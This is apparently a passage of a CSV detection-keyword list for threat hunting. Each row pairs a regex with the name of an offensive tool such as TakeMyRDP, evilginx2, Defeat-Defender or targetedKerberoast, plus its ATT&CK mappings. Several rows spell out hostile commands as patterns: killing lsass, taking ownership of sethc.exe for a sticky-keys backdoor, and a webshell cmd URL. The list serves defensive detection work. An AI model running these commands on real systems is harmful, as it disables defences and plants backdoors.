T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_netbsd_*",".{0,1000}TailorScan_netbsd_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_openbsd_*",".{0,1000}TailorScan_openbsd_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival 
detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_windows_*.exe*",".{0,1000}TailorScan_windows_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TakahiroHaruyama/VDR*",".{0,1000}TakahiroHaruyama\/VDR.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*take_shellcode.bat*",".{0,1000}take_shellcode\.bat.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*TakeMyRDP*logfile.txt*",".{0,1000}TakeMyRDP.{0,1000}logfile\.txt.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","2","100","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" "*TakeMyRDP.cpp*",".{0,1000}TakeMyRDP\.cpp.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - 
T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP.exe*",".{0,1000}TakeMyRDP\.exe.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP.git*",".{0,1000}TakeMyRDP\.git.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP.h*",".{0,1000}TakeMyRDP\.h.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","2","100","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" "*TakeMyRDP.sln*",".{0,1000}TakeMyRDP\.sln.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP.vcxproj*",".{0,1000}TakeMyRDP\.vcxproj.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - 
TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP2.0*",".{0,1000}TakeMyRDP2\.0.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","2","100","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" "*TakeMyRDP-main*",".{0,1000}TakeMyRDP\-main.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*takeown /f ""%systemroot%\System32\smartscreen.exe"" /a*",".{0,1000}takeown\s\/f\s\""\%systemroot\%\\System32\\smartscreen\.exe\""\s\/a.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*takeown /f c:\windows\system32\sethc.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*takeown /f 
c:\windows\system32\sethcold.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethcold\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*tanc7/EXOCET-AV-Evasion*",".{0,1000}tanc7\/EXOCET\-AV\-Evasion.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*Taonn/EmailAll*",".{0,1000}Taonn\/EmailAll.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*target/debug/wstunnel*",".{0,1000}target\/debug\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*target/tomcatwar.jsp?pwd=j&cmd=*",".{0,1000}target\/tomcatwar\.jsp\?pwd\=j\&cmd\=.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" 
"*TARGET=evilginx*",".{0,1000}TARGET\=evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*targetedKerberoast.git*",".{0,1000}targetedKerberoast\.git.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*targetedKerberoast.py*",".{0,1000}targetedKerberoast\.py.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*targetedkerberoast_attack*",".{0,1000}targetedkerberoast_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*targetedkerberoast_hashes_*.txt*",".{0,1000}targetedkerberoast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - 
TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*targetedkerberoast_output_*.txt*",".{0,1000}targetedkerberoast_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*targetedKerberoast-main*",".{0,1000}targetedKerberoast\-main.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*targetver.h*",".{0,1000}targetver\.h.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","458","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*TartarusGate-master*",".{0,1000}TartarusGate\-master.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","10","5","448","59","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z" "*tarunkant/Gopherus*",".{0,1000}tarunkant\/Gopherus.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 
- T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*tas389.ps1*",".{0,1000}tas389\.ps1.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Tasked Beacon to escalate to SYSTEM*",".{0,1000}Tasked\sBeacon\sto\sescalate\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","0","N/A","10","1","81","8","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z" "*taskkill /F /IM lsass.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\slsass\.exe.{0,1000}","offensive_tool_keyword","taskkill","killing lsass process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://x.com/malmoeb/status/1741114854037987437","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /IM msiexec.exe*",".{0,1000}taskkill\s\/F\s\/IM\smsiexec\.exe.{0,1000}","offensive_tool_keyword","taskkill","evade EDR/AV by repairing with msiexec and killing the process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://badoption.eu/blog/2024/03/23/cortex.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /T /IM keepass.exe /FI*",".{0,1000}taskkill\s\/F\s\/T\s\/IM\skeepass\.exe\s\/FI.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*taskkill /IM tor.exe /F*",".{0,1000}taskkill\s\/IM\stor\.exe\s\/F.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*taskkill.exe /F /IM lsass.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\slsass\.exe.{0,1000}","offensive_tool_keyword","taskkill","killing lsass process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://x.com/malmoeb/status/1741114854037987437","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill.exe /F /IM msiexec.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\smsiexec\.exe.{0,1000}","offensive_tool_keyword","taskkill","evade EDR/AV by repairing with msiexec and killing the process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://badoption.eu/blog/2024/03/23/cortex.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*tasklist /fi *Imagename eq lsass.exe* | find *lsass*",".{0,1000}tasklist\s\/fi\s.{0,1000}Imagename\seq\slsass\.exe.{0,1000}\s\|\sfind\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*TaskShell.exe * -b *.exe*",".{0,1000}TaskShell\.exe\s.{0,1000}\s\-b\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","57","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*TaskShell.exe * -s *SYSTEM*",".{0,1000}TaskShell\.exe\s.{0,1000}\s\-s\s.{0,1000}SYSTEM.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","57","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" 
"*tastypepperoni/PPLBlade*",".{0,1000}tastypepperoni\/PPLBlade.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*tastypepperoni/RunAsWinTcb*",".{0,1000}tastypepperoni\/RunAsWinTcb.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*tbMangler.py encode *",".{0,1000}tbMangler\.py\sencode\s.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*tcpClient.connectTCP(*127.0.0.1*1337*",".{0,1000}tcpClient\.connectTCP\(.{0,1000}127\.0\.0\.1.{0,1000}1337.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. 
It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","371","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" "*tcpreplay*",".{0,1000}tcpreplay.{0,1000}","offensive_tool_keyword","tcpreplay","Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.","T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://tcpreplay.appneta.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tcpshell.py*",".{0,1000}tcpshell\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*tdragon6/Supershell*",".{0,1000}tdragon6\/Supershell.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*TeamFiltration.exe *",".{0,1000}TeamFiltration\.exe\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration\Program.cs*",".{0,1000}TeamFiltration\\Program\.cs.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential 